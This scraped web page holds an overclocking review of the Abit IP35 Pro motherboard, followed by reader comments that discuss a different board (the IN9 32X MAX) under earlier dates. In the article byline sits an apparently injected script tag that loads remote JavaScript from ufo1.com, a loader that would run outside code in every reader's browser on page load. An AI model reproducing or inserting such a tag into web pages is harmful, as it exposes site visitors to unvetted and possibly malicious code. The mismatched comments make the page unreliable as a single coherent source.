Abit IP35 Pro Intel socket 775 Motherboard

Overclocking

Article <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 25/07/07
Author: Matt Kemp
Source: abit


Overclocking

Overclocking was performed through the BIOS, as all good 24/7 overclocking should be done. The IP35 is solid and stable and has some excellent options there so I was holding out for some good clocks.

Note here that I am using the Xeon 3070 and that overclocking is significantly easier with this CPU than my E6700ES. I am expecting the board and CPU to put up some high numbers.

Low Voltage Overclocking

I usually start off by overclocking using low voltages. As the Xeon 3070 I am using is so good I will start with 1.35v set in the BIOS. With the control you have over the board in the Phoenix Award BIOS the abit was easy to overclock and at this low voltage the Xeon managed a more than healthy 3.6GHz.

3600MHz

3.6GHz

Can't complain at that, although remember that the Xeon is a very good overclocker.

Overclocking - Highest Possible Stable on Air

With this test I took the volts up to as high as I felt comfortable with to see what I could get.

4GHz

4000MHz stable

I attained 4000MHz (4GHz) dual prime stable on air after some tweaking at a voltage of 1.6v. This is very impressive results but again remember that the Xeon is an awesome overclocker.

Max FSB

For this test I simply tried to get the highest front side bus speed I could on the board, booting into windows. This is not a test of stability, just how high I can boot into windows and take a screenshot.

520fsb

520fsb

I think that an upgrade in the cooling on the NorthBridge would lead to even better results than this, but 520 FSB is excellent for a board on stock cooling with no tweaks or mods.

The Abit IP35 Pro was incredibly easy to overclock with a huge range of voltage selections and excellent bad overclock recovery. If you're looking for a board to get a nice high stable overclock I would thoroughly recommend it.
«Prev 1 2 3 4 5 6 7 8 9 Next»

Most Recent Comments

14-02-2007, 08:41:40

FarFarAway
Top dollar...but is it a top board?

Take a look inside...click

World Exclusive!!! - Digg It

14-02-2007, 09:13:14

Rastalovich
Great review Kemp, nice bunch of packaging akin to the rocketboy type of stuffz. I do wish the µguru thing was more of a 5.25 bay thingy tbh. Last time I checked, retailers were ramming these devices down peoples throats for like £11 or so - which amazes me why u never had one in the box ?!?

I would hope these good results will boost a tad more after some bios revisions, board to board I`d expect this one to be a bit better than shown - but meh..

Kewl, I recognize some of those photos too

14-02-2007, 09:27:58

PV5150
Excellent review as usual mate. The 680i's are toasty little sods for sure, and it's a pity that abit didn't even provide some form of active cooling to try and address the problem. Well done

14-02-2007, 09:35:57

Rastalovich
Their answer, and a few other manufs answer, seems to be to add this ugly looking heatpipe structure to stuff.

Heatpipes are great, but I don`t personally like the idea of 2 or 3 of the hs being connected together.

14-02-2007, 09:38:11

FarFarAway
2 or 3 connected together is fine, but that needs active cooling to work ok

14-02-2007, 10:51:54

TJS
Great review, Kemp, thanks for doing it as I was thinking of grabbing one. Now for my thoughts...

DAMN DAMN DAMN! I think the 680i chipset is good but not the king, would really like to see the 975X (or updated chipset) that can support nVidia's 8800 series gpu's in SLI... and done by ABIT. ABIT boards look great, and with the exception of the EZ PLUG for added graphics power, I like their layouts; not to mention my AW9D was rock-solid, even using an E6600 @ 3.7GHz... my 680i mobo can't touch it, only solid at 3.4GHz or lower.

Like the EZ CMOS as well, no more dip-switch installations! (newer mobos don't have problems like the old mobos after a bad OC, but it's the thought that counts!)

I personally don't see all the fuss over the passive cooling for the NB/SB. My case uses 4 120mm fans on the side of the case, so I get a lot of extra cooling... not to mention the little fan that came with my mobo for the NB, so I don't have a heating problem. I think it works fine, even without the little fan made for the NB; on the other hand, an enthusiast board should give the user the option to remove the passive to add active (fan) cooling solutions. The only thing I wonder about is the need for pipes from SB--NB--PWM... do the pipes really do anything for the cooling?

TJS

14-02-2007, 11:14:12

BUFF
Thorough review as always.

You might have mentioned that they definitely are actively working on an updated BIOS though?

Quote:
Originally Posted by name='Rastalovich'
do wish the µguru thing was more of a 5.25 bay thingy tbh.
you mean like http://www.abit-usa.com/news/2005/20050511.php ?

14-02-2007, 11:28:52

FarFarAway
That's the µguru panel - felt it should have been included with this board - would have certainly been a welcome addition

And yes I was going to put that in, but must have missed it out (twast 2.30am). I'll add it now

14-02-2007, 11:40:10

BUFF
btw , I do believe that this is the world's first full published review of the IN9 32X MAX

edit: at least in English. Possibly done on a Japanese/Chinese site etc. where I would only be able to look at pretty pictures.

14-02-2007, 12:09:15

JN
Quote:
Originally Posted by name='BUFF'
btw , I do believe that this is the world's first full published review of the IN9 32X MAX
Oooh wasn't aware of that Come on Google, update that Index

Edit: And in that case - Digg It

14-02-2007, 12:22:35

Ares210
Very thorough review like always. Seems like a rock solid board, at stock

Dugg.

14-02-2007, 12:45:02

NickS
Gotta love how 680i gets its butt kicked by 965/975

Great review Kempez. Awesome pictures, using your new camera I'm guessing?

15-02-2007, 03:39:09

FarFarAway
Quote:
Originally Posted by name='NickS'
Gotta love how 680i gets its butt kicked by 965/975
It does in a way...although it seems that in gaming 680i pwns hard...and I'm not quite sure why (linkboost shouldn't work with an x1600Pro)

Quote:
Originally Posted by name='NickS'
Great review Kempez. Awesome pictures, using your new camera I'm guessing?
Thanks and yep with maaa new camera

15-02-2007, 10:58:24

Praxis1452
only going to 440mhz max seems a bit low...

15-02-2007, 10:59:49

FarFarAway
Quote:
Originally Posted by name='Praxis1452'
only going to 440mhz max seems a bit low...
Agreed. I'm talking to abit about that now but the review got published 'cause they'd had over the 24hours to reply

15-02-2007, 11:22:30

BUFF
I've seen a screenie at 525 on 1 of the betas plus it seems to be overclocking Kentsfields better than the Striker/eVGA.

P.S. I put a link to your review in [H]ardOCP's forum IN9 32X thread.

15-02-2007, 11:28:14

FarFarAway
Just waiting to hear back from abit atm but I may give it another go on one of the beta's if they ask me too. May need a dedicated fan on the NB though as it's toasty: which I didn't do for the other boards (I hasten to add)

EDIT: abit said they've had 550FSB in the labs

15-02-2007, 17:47:45

TJS
I'm inclined to believe that if the NB was cooled on the ABIT board like it is on the EVGA board it should do much better than 440FSB. I can't see ABIT putting out the smashing AW9D-MAX and then fall on their faces with the IN9 32X-MAX.

TJS

15-02-2007, 17:56:23

FragTek
The AW9D-MAX does far from smash, I hated that board, and so did 90% of the other poor ripped off owners of it.

15-02-2007, 20:00:05

TJS
Hey, Frag, mine worked like a charm... didn't know so many had problems (other than Herr Schmidt). I thought a lot of people were getting some pretty good clocks compared to the 680i (don't know too much about the RD600 yet).

TJS

15-02-2007, 20:01:14

FarFarAway
Quote:
Originally Posted by name='TJS'
I'm inclined to believe that if the NB was cooled on the ABIT board like it is on the EVGA board it should do much better than 440FSB. I can't see ABIT putting out the smashing AW9D-MAX and then fall on their faces with the IN9 32X-MAX.
The fact is though that the cooler gets very very hot

15-02-2007, 20:17:37

NickS
Passive chipset heatsink + extremely hot running chipset = ?

16-02-2007, 03:17:34

JN
I find all this passive heatpipe nonsense very annoying personally. It wouldn't surprise me if it's cheaper than adding a fan, and that's the reason so many manufacturers are taking it onboard.

They build a board for enthusiasts, but the first thing enthusiasts do is rip off the nb cooling and replace it with something else (something that isn't aluminium sprayed in a copper colour).

16-02-2007, 03:19:21

FarFarAway
If only they would implement a decent 3rd party solution or even get a decent solution in-house

16-02-2007, 03:24:30

JN
Quote:
Originally Posted by name='Kempez'
If only they would implement a decent 3rd party solution or even get a decent solution in-house
Yep, something made out of copper with a fan on top. Not too much to ask really when you're paying over £200 for a motherboard.
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.